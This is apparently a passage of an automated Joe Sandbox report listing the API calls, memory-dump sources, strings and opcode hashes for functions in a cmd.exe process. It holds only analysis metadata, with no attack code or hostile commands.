                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1013686580-0
                                                                                        • Opcode ID: b23da2671691e09482243967af0a3ff8e1c9b0b865b0baeb639dd93ae25b62fd
                                                                                        • Instruction ID: 3cbd64d370b9ed4cdc48879c1adbab5749fe4c3307d672de6897cc49f1d5700d
                                                                                        • Opcode Fuzzy Hash: b23da2671691e09482243967af0a3ff8e1c9b0b865b0baeb639dd93ae25b62fd
                                                                                        • Instruction Fuzzy Hash: A811A031204200AFD2282BA8EC4AB257B76EF89721F358516F109DA2E0EB719C50DA35
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00D88571
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00D8857E
                                                                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 00D885C7
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 00D885D5
                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D885DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 3008996577-0
                                                                                        • Opcode ID: ccf55faa8c605d60913d1930a1ec99b844b2e2d0fa4daaa8cb2e151c2d6b1f98
                                                                                        • Instruction ID: 3dc7b7851f42e0c4f863c954c4c20fa4d7c69a87b7bbe8024ab2d84bf6094fcc
                                                                                        • Opcode Fuzzy Hash: ccf55faa8c605d60913d1930a1ec99b844b2e2d0fa4daaa8cb2e151c2d6b1f98
                                                                                        • Instruction Fuzzy Hash: 9111F935910349ABCB05EFB8DC05AEEB7B8EF0D710F10425AE515E7290EB349905CB7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D70A41), ref: 00D71F1A
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D71F2B
                                                                                        • memset.MSVCRT ref: 00D71F45
                                                                                        • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00D7F185
                                                                                        • memset.MSVCRT ref: 00D7F1FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                                        • String ID:
                                                                                        • API String ID: 1263632223-0
                                                                                        • Opcode ID: 5f810b7e7726dc5bb898548e49450851f04323252c4872623f4e1fd8dbd9020a
                                                                                        • Instruction ID: 9e67d835c67637da516e210c0b5daed6d52c4195928cb2782a16cdd1694fc39f
                                                                                        • Opcode Fuzzy Hash: 5f810b7e7726dc5bb898548e49450851f04323252c4872623f4e1fd8dbd9020a
                                                                                        • Instruction Fuzzy Hash: 68114CB5E28312B9DB315F18DC067617654AB01301F8C9277ECCDD5295F7648C819B79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00D77122
                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D77131
                                                                                        • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D7713A
                                                                                        • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00D77143
                                                                                        • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00D77158
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                        • String ID:
                                                                                        • API String ID: 1445889803-0
                                                                                        • Opcode ID: b0e9132a8381070998adad485214903e14c4bc56c28d1c57042f91590d10314e
                                                                                        • Instruction ID: 8f365da3ef1dd12dd94b35f2cbf445d41f7a4dc26150389b617730c8f5f6ec4b
                                                                                        • Opcode Fuzzy Hash: b0e9132a8381070998adad485214903e14c4bc56c28d1c57042f91590d10314e
                                                                                        • Instruction Fuzzy Hash: 4111F571D15308ABCB10DBB8DA4869EB7F5BB58311FA65965D806EB260E7309B00CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D8484A
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D84879
                                                                                        • _getch.MSVCRT ref: 00D8487F
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D84897
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00D787E5,00000000,?,00D64A0A), ref: 00D848AD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                        • String ID:
                                                                                        • API String ID: 491502236-0
                                                                                        • Opcode ID: 6b4ba06d4200f4d5b2ec20e8dc85d32b47c225884a4bdf26a1d2c4d849414376
                                                                                        • Instruction ID: a74fc8a91395dd636ac0f432dd7d909e78364dd0216eff42f716e16dd8ad785b
                                                                                        • Opcode Fuzzy Hash: 6b4ba06d4200f4d5b2ec20e8dc85d32b47c225884a4bdf26a1d2c4d849414376
                                                                                        • Instruction Fuzzy Hash: D0018F36104351BFEB55BBA5AC0AB6E7B78DF02724F15021AF805D62E0DBB58940CBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D6A9C5), ref: 00D6A9D8
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D6A9F3
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6A9FA
                                                                                        • memcpy.MSVCRT ref: 00D6AA09
                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D6AA12
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 713576409-0
                                                                                        • Opcode ID: 6f02563b7d5b267837190c940491941bf39ded131d6e5122f2d751fe93869a6e
                                                                                        • Instruction ID: 9bb6873d527156339ed830a14f1a4c17b985607a4749ea16f2d47424aa79de95
                                                                                        • Opcode Fuzzy Hash: 6f02563b7d5b267837190c940491941bf39ded131d6e5122f2d751fe93869a6e
                                                                                        • Instruction Fuzzy Hash: 56E0127760172077D211676D6D88D7F2A5DDBCA661B0A0115F949E3301DF298C06CAB3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D66513: memset.MSVCRT ref: 00D66593
                                                                                          • Part of subcall function 00D6DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00D68E86,00D68E5A,00000000), ref: 00D6DC98
                                                                                          • Part of subcall function 00D6DC60: RtlFreeHeap.NTDLL(00000000), ref: 00D6DC9F
                                                                                        • memset.MSVCRT ref: 00D7A097
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heapmemset$FreeProcess
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1291122668-438819550
                                                                                        • Opcode ID: 213e3dbd493f1b79466c2b897f3baae6c6d490962e42c59eb3cc48cd81b96c5b
                                                                                        • Instruction ID: 3216e55c31be028730c1c6a2d059d71ae3ff0f35b64489ac2367abff5a5808a2
                                                                                        • Opcode Fuzzy Hash: 213e3dbd493f1b79466c2b897f3baae6c6d490962e42c59eb3cc48cd81b96c5b
                                                                                        • Instruction Fuzzy Hash: 95B1A271E00219AFDF24DFA8C845AAEB7B1EF98710F198059EC09AB255E731DD41CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00D85997
                                                                                          • Part of subcall function 00D6AB7F: iswspace.MSVCRT ref: 00D6AB8D
                                                                                          • Part of subcall function 00D6AB7F: wcschr.MSVCRT ref: 00D6AB9E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enumiswspacewcschr
                                                                                        • String ID: %s=%s$\Shell\Open\Command
                                                                                        • API String ID: 3493821229-3301834661
                                                                                        • Opcode ID: c277076c2d5263b1999528082a0a1b8fcff36eb01aa100ad5cf877bb17f88b75
                                                                                        • Instruction ID: 412b75487694f720b2de9b8f8ce114e3368ecbab1d933b88578aed2ec4c97d19
                                                                                        • Opcode Fuzzy Hash: c277076c2d5263b1999528082a0a1b8fcff36eb01aa100ad5cf877bb17f88b75
                                                                                        • Instruction Fuzzy Hash: CA814E71E006195BCF28BB28ECD5BFA737AEF94704F1841A9E40A97244EA709E418F70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$@$@wyu
                                                                                        • API String ID: 0-214780934
                                                                                        • Opcode ID: 06518f24bd19eb30d19667dd9804c1508b84c7cfe21222d84120b5635f269b9e
                                                                                        • Instruction ID: 0fab3a91aee898abbdcf2c91b99f6a144edb548d31d349852738c66540d5d411
                                                                                        • Opcode Fuzzy Hash: 06518f24bd19eb30d19667dd9804c1508b84c7cfe21222d84120b5635f269b9e
                                                                                        • Instruction Fuzzy Hash: B2813B75D002699BDB31DB54CC44BEEB7B8AF48714F0445EAEA09BB240E7709E84DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                                        • API String ID: 0-1704545398
                                                                                        • Opcode ID: 0400ac4ddfee2876520601e3ee381338dd0483dfb3854288bfa3ed41e444e281
                                                                                        • Instruction ID: 2aa83b7efe52d2b8c27b4a8ea7df63cec4f9f090a46c1de346e2df68f12ab71e
                                                                                        • Opcode Fuzzy Hash: 0400ac4ddfee2876520601e3ee381338dd0483dfb3854288bfa3ed41e444e281
                                                                                        • Instruction Fuzzy Hash: FE513631B202018BD724BB68D81577A7672EB95358F19513AE4CAC7392FBB2DC44CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswdigit$wcstol
                                                                                        • String ID: aApP
                                                                                        • API String ID: 644763121-2547155087
                                                                                        • Opcode ID: 940a4e4244e8ea16835abc1efc21ed4288a85ef856c8ad4f24b08d9a9de56359
                                                                                        • Instruction ID: ad4011e0d2434e1e4efac67e2d10637f112b1225ada795532f12e1966b967425
                                                                                        • Opcode Fuzzy Hash: 940a4e4244e8ea16835abc1efc21ed4288a85ef856c8ad4f24b08d9a9de56359
                                                                                        • Instruction Fuzzy Hash: 7041C075A0022786CF24FF69C89167BB3A5FF95700B19442AF946EB280FA34DD42C7B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00D857F8
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00D85886
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumErrorLast
                                                                                        • String ID: %s=%s$.
                                                                                        • API String ID: 1967352920-4275322459
                                                                                        • Opcode ID: f5926d5729f0280fef9ef20922217f87be057a77cbb720609e7e29c32961d7ae
                                                                                        • Instruction ID: a051df9a24fb687d6b01f3c08225ae1f74285755a6f93f739d40519082ec30bb
                                                                                        • Opcode Fuzzy Hash: f5926d5729f0280fef9ef20922217f87be057a77cbb720609e7e29c32961d7ae
                                                                                        • Instruction Fuzzy Hash: CD415B35E4061997CF34BB29AC95ABF7379EF84310F1941AEE80A97245DA708E41CFB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8A79F
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 00D8A83C
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8A8B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$DiskFreeSpace
                                                                                        • String ID: %5lu
                                                                                        • API String ID: 2448137811-2100233843
                                                                                        • Opcode ID: 199fbc4308bd47dfedde24ad50788654aa74d7589e9223bac5a2753d8099412c
                                                                                        • Instruction ID: 23217cbd1579b7223a3ee9f0befbb9c88a54c4e3c150f5ed45ad90248006a24d
                                                                                        • Opcode Fuzzy Hash: 199fbc4308bd47dfedde24ad50788654aa74d7589e9223bac5a2753d8099412c
                                                                                        • Instruction Fuzzy Hash: DC414671A00219ABDB24EBA4DC95BAEB7B8FF08304F0444ADE509E7241E7749E85CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00D83835
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D83847
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastOpenSemaphore
                                                                                        • String ID: _p0$wil
                                                                                        • API String ID: 1909229842-1814513734
                                                                                        • Opcode ID: 45e2df602c3a1fe3c6027078970ccc22cdd270d6a0f92b14e0ca39dd80b63f3b
                                                                                        • Instruction ID: 0112b0bce016c15b85dcb0246489df72eb747407e238a560596d60a7a26ff032
                                                                                        • Opcode Fuzzy Hash: 45e2df602c3a1fe3c6027078970ccc22cdd270d6a0f92b14e0ca39dd80b63f3b
                                                                                        • Instruction Fuzzy Hash: 6F41A7B1E012298BCB25EF28C8555A977B5EF94B00F198299E809D7354DB70DF458BB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 00D8239F
                                                                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00D823CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateCurrentMutexProcess
                                                                                        • String ID: Local\SM0:%d:%d:%hs$wil
                                                                                        • API String ID: 3937467467-2303653343
                                                                                        • Opcode ID: 9009b0bbdd749d4120b1452231c9b0c549e5d9184a0e6292309cd875b30ea237
                                                                                        • Instruction ID: 9b729e0644d645aa790c84f40451c0a83db762a1a4e4d6d09d632381b7040211
                                                                                        • Opcode Fuzzy Hash: 9009b0bbdd749d4120b1452231c9b0c549e5d9184a0e6292309cd875b30ea237
                                                                                        • Instruction Fuzzy Hash: AA41B6B5A402289BCB21FB58DC89EFAB7B5EF94710F144185E809A7341EB709F458FB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_wcslwr
                                                                                        • String ID: [%s]
                                                                                        • API String ID: 886762496-302437576
                                                                                        • Opcode ID: 73c7d33026a6a4c17eefe7e8639cf5fe0a1a6b8b6031b60a9e83c2e97df2a32d
                                                                                        • Instruction ID: f56f9747dc15743416f3ee435c875c60013b64fefb1a6bcc9fe4292c94afae04
                                                                                        • Opcode Fuzzy Hash: 73c7d33026a6a4c17eefe7e8639cf5fe0a1a6b8b6031b60a9e83c2e97df2a32d
                                                                                        • Instruction Fuzzy Hash: BB316471A012199BDB14EBE9DCC5BAEBBB8EF59350F08006AE505E7241EB74DE448B70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsnicmp
                                                                                        • String ID: /-Y$COPYCMD
                                                                                        • API String ID: 1886669725-617350906
                                                                                        • Opcode ID: e8f28d77284f89d51339803c546788f963fc879967416a919de102a54ee8f669
                                                                                        • Instruction ID: f50dd4d691ba27ea9e3e727cf8c5c3fac4cba3ca5834af5676447338eb9063d6
                                                                                        • Opcode Fuzzy Hash: e8f28d77284f89d51339803c546788f963fc879967416a919de102a54ee8f669
                                                                                        • Instruction Fuzzy Hash: 51218B71A00211ABCB299B1D9C557BBBAF9EF89354B598069F88DE7240FBB0CD01C370
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D69E8E: iswspace.MSVCRT ref: 00D69E9E
                                                                                        • iswspace.MSVCRT ref: 00D69E28
                                                                                        • _wcsnicmp.MSVCRT ref: 00D69E79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswspace$_wcsnicmp
                                                                                        • String ID: off
                                                                                        • API String ID: 3989682491-733764931
                                                                                        • Opcode ID: e8eb052b3d96fb6d60f7a59411123d9ec875d612bbdabfd7c799a5caa95655dd
                                                                                        • Instruction ID: 485ddb09156f4d5fab8694e0392a2e80ff1b3b3052fe92b213a2e24186ab1cb2
                                                                                        • Opcode Fuzzy Hash: e8eb052b3d96fb6d60f7a59411123d9ec875d612bbdabfd7c799a5caa95655dd
